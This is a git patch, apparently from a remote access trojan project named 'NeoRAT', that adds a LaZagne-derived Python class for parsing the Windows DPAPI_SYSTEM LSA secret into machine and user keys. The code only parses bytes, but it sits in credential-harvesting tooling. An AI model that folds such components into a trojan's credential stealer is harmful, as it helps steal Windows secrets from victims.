From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../client_handling/lazagne/config/DPAPI/system.py | 38 ++++++++++++++++++++++
 1 file changed, 38 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/config/DPAPI/system.py

(limited to 'foreign/client_handling/lazagne/config/DPAPI/system.py')

diff --git a/foreign/client_handling/lazagne/config/DPAPI/system.py b/foreign/client_handling/lazagne/config/DPAPI/system.py
new file mode 100644
index 0000000..aaf53f8
--- /dev/null
+++ b/foreign/client_handling/lazagne/config/DPAPI/system.py
@@ -0,0 +1,38 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+Code based from these two awesome projects: 
+- DPAPICK 	: https://bitbucket.org/jmichel/dpapick
+- DPAPILAB 	: https://github.com/dfirfpi/dpapilab
+"""
+
+from .eater import DataStruct
+
+
+class CredSystem(DataStruct):
+    """
+    This represents the DPAPI_SYSTEM token which is stored as an LSA secret.
+
+    Sets 2 properties:
+        self.machine
+        self.user
+    """
+
+    def __init__(self, raw=None):
+        self.revision = None
+        self.machine = None
+        self.user = None
+        DataStruct.__init__(self, raw)
+
+    def parse(self, data):
+        """Parses the given data. May raise exceptions if incorrect data are
+            given. You should not call this function yourself; DataStruct does
+
+            data is a DataStruct object.
+            Returns nothing.
+
+        """
+        self.revision = data.eat("L")
+        self.machine = data.eat("20s")
+        self.user = data.eat("20s")
-- 
cgit v1.2.3